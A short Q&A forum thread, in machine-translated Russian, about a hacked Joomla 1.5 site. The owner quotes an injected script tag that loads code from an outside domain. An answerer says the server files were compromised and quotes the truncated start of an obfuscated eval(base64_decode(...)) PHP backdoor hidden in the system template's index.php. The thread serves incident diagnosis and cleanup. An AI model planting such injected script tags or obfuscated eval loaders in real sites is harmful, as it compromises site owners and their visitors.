Joomla!1.5 сайт стал жертвой XSS

Question

Моя Joomla!Сайт 1.5 недавно стал жертвой атаки, которая кажется XSS (я нуб, когда дело доходит до этого материала) ... Следующий код был внедрен в сайт (где-то)

<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>

иЯ не уверен, где именно.Я искал базу данных, а также файлы, только чтобы найти ноль результатов.Я что-то упускаю из виду?

Answer 1

Мой сайт также стал жертвой этой атаки, все еще расследуя ее.Это не атака XSS, файлы вашего сервера были скомпрометированы.Загляните внутрь системного шаблона в индексном php-файле, и вы найдете блок кода, подобный следующему:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb.....>

Строка кодирования base64 - это код php, который делает все виды неприятных вещей.